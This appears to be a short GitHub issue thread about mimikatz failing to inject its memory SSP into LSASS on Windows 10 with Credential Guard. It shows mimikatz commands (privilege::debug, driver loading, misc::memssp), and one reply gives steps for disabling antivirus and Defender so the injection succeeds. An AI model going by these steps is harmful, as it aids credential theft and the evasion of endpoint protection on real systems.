Error injecting SSP with Windows 10 1903 and credential guard enabled

[bufferovercat]

Hi,

I am unable to inject mimilib when using Windows 10 1903 and credential guard is enabled. Is it currently supported?

mimikatz # privilege::debug Privilege '20' OK

mimikatz # !+ [+] 'mimidrv' service already registered [*] 'mimidrv' service already started

mimikatz # misc::memssp ERROR kuhl_m_misc_memssp ; OpenProcess (0x00000005)``

[gentilkiwi]

Maybe LSASS is on protected process mode, maybe there is an antivirus enabled that does not like someone is touching LSASS ;)

[Papotito123]

Hello: If mimikatz were downloaded from internet,verify in Properties of each file that are all Unlocked.Files from internet that are Unlocked could gives alert flags to Security.

Sometimes when having this error I try this. Shutdown properly the computer. Wait until OS Is fully up and running stable. I disable my Avast and wait 4-5 seconds. Having another AV,just put Defender in some "hibernation-alike" mode that only reacts when needed.But can be a pain Then run mimikatz with; mimikatz log privilege::debug. , wait 2-3 seconds !- , and wait 2-3 seconds (is to be sure no mimidriver is running( !+ ,and wait 2-3 seconds(is to be sure mimidriver is running full) then run , misc::memssp If still throws error , there's Defender or any other having modules running in background.

Hope this helps.